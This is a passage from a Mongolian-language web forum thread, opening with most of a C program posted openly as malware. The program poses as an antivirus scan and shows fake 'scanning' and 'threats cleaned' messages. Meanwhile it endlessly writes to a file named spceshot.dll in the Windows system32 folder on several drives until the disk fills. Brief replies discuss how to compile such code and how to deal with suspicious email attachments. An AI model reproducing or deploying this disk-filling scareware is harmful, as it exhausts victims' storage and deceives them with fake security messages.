b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("E:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
t=fopen("F:\\windows\\explorer.exe","rb");
if(t!=NULL)
{
fclose(t);
a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
if(a!=NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
getch();
exit(1);
}
b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
if(b!=NULL)
{
showstatus();
eatspace();
}
}
if(t==NULL)
{
textcolor(LIGHTRED);
gotoxy(12,8);
cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
getch();
exit(1);
}
exit(1);
}

void eatspace()
{
textcolor(LIGHTRED);
gotoxy(12,16);
cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
textcolor(WHITE);
gotoxy(12,18);
while(1)
{
for(r=1;r<4;r++)
{
for(i=1;i<900000;i++)
{
status=fputs(ch,b);
if(status==EOF)
{
textcolor(WHITE);
vir_count=random(120);
draw();
gotoxy(12,8);
cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
gotoxy(12,10);
cprintf("PRESS ANY KEY TO CLOSE...");
getch();
break;
}
}
cputs(".");
if(status==EOF) break;
}
if(status==EOF) break;
}
exit(0);
}

void showstatus()
{
gotoxy(12,8);
cputs("SCANNING THE SYSTEM FOR THREATS");
gotoxy(12,10);
cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
gotoxy(12,13);
cputs("SCAN IN PROGRESS. PLEASE WAIT...");
}
Eniigee yun dee yaj bichih vv?
Notepad dee bat-aar bichih vv?
medehguin bol oroldood demii bhoo. zugeer ter shutdown ntr-iig hiij uzeel bj bhad bolno biz. esvel zaaval hiij uzmeer bgaan bol c, c++ anhan shatnii medegdehuuntei bolchood oroldson ni deer bh. bichihiin huvid yamar ch text editor deer bichij bolno. gehee compiler ni hereg boloh bh daa.


Top
   
PostPosted: Dec.01.17 10:41 am 
Offline
Төгөлдөр гишvvн
Төгөлдөр гишvvн
User avatar

Joined: Dec.26.05 12:43 pm
Posts: 86
Location: ub
suuliin uyed neg pdf attachtai esvel html attachtai viruus gej helehed hetsuu ym humuus ih yavuldag boljee

dotor ni pass user nemee hiij send hiilgeh zorilgotoi l ymshig bgan ternii henluu yavj bgaag ni harin yaj harah bolomjtoi ve ter talaar medeh hun bn uu



------------
husvel ireed bga ter fileiig ni yavulj bolno shuu

_________________
-----------------
mirage


Top
   
PostPosted: Jul.29.19 4:10 pm 
Offline
Хавар Цагийн Анхны Яргуй
User avatar

Joined: Feb.28.03 6:07 pm
Posts: 3493
Location: Зүрх бол тэнэг эрхтэн тул тархиараа сэтгэ.
Quote:
suuliin uyed neg pdf attachtai esvel html attachtai viruus gej helehed hetsuu ym humuus ih yavuldag boljee

dotor ni pass user nemee hiij send hiilgeh zorilgotoi l ymshig bgan ternii henluu yavj bgaag ni harin yaj harah bolomjtoi ve ter talaar medeh hun bn uu



------------
husvel ireed bga ter fileiig ni yavulj bolno shuu
Ter byriig medeh geed hoogood yavma gdg tsagiim garz. Terend orohnee zygeer l spam geed zaagaad ogchixson ni deer.

_________________
Bariin syylnees batganii tolgoi


Top
   
Display posts from previous:  Sort by  
Post new topic  Reply to topic  [ 95 posts ]  Go to page Previous 1 2 3 4

All times are UTC+09:00


Who is online

Users browsing this forum: No registered users and 2 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron

Copyright Asuult.NET © 2000-2015.
Administrative Contact: Khundaga Khurelbaatar [hundaga@hotmail.com]
Tel: 1-888-303-4927, Fax: 1-888-406-2264.
Powered by phpBB © 2000-2015 phpBB Group. Powered by phpBB® Forum Software © phpBB Limited